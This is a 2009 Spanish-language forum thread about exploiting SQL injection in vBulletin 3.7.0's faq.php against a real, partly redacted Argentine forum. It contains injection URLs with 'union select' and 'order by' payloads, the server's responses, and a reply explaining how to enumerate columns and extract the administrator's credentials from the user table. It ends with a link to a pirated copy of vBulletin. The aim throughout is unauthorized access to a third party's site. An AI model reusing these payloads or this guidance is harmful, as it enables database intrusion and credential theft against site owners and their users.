Alguna vulnerabilidad en VBulletin?

Iniciado por Skeletron, 6 Diciembre 2009, 05:50 AM

0 Miembros y 1 Visitante están viendo este tema.

Skeletron

Hola gente..
Alguien conoce alguna vulnerabilidad en VBulletin 3.7.0?


Skeletron

Cuando intento lo que "recomienda  probar".. dice:

Database Error     Database error
The xxxxxxxx database has encountered a problem.
Please try the following:

    * Load the page again by clicking the Refresh button in your web browser.
    * Open the www.xxxxxxxxxx.com.ar home page, then try to open another page.
    * Click the Back button to try another link.

The www.xxxxxxxxxxxxxxx.com.ar forum technical staff have been notified of the error, though you may contact them if the problem persists.

We apologise for any inconvenience.

Skeletron

Alguien tiene VBulletin 3.7.0 ???

Me tira el codigo fuente del faq.php??

WHK

Ese error significa que intentaste hacer una inyección SQL pero quedó mal hecha por lo tanto la query quedó corrupta y te devolvió un error.

Eso significa que si es vulnerable a inyección SQL.

Cuando dicen:
http://www.domain.com/vBulletin/faq.php?s=&do=search&q=[Sqlinjection]&match=any&titlesonly=1

Significa que donde dice "[Sqlinjection]" debes reemplazarlo por tu inyección SQL, o sea... vas probando con el famoso ' order by 99, despues el union select 12345... etc etc y despues vas sacando los accesos de la columna de usuario donde generalmente el primer id válido de la tabla es el administrador.

Skeletron

#5
Con un:
.com.ar/foros/faq.php?s=&do=search&q=' union select '1&match=any&titlesonly=0

me devulve ésto la web:
1||1260129794||190.230.57.174||s=&do=search&q=%27%20union%20select%20%271&match=any&titlesonly=0||||Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)Access Denied, you have been logged.

solamente ese texto...
y con el:
.com.ar/foros/faq.php?s=&do=search&q=' ORDER BY '1&match=any&titlesonly=0
Deja de dar error.. pero la busqueda no devuelve resutaldo..
Tampoco espero que devuelva algo.. si la busqueda se hace en un FAQ! :/


Por eso me gustaria tener todo el codigo de vBulletin 3.7.0 para poder analizarlo... a ver que se puede hacer..

WHK

Lo que sucede esque
.com.ar/foros/faq.php?s=&do=search&q=' union select '1&match=any&titlesonly=0
está mal porque como sabes si la tabla tiene una sola columna o no, eso debería darte error.

http://www.programaswarez.com/descargar-scripts-gratis/4294-descargar-vbulletin-3-7-0-gold-vbulletin-blog-1-05-keygen-free-download.html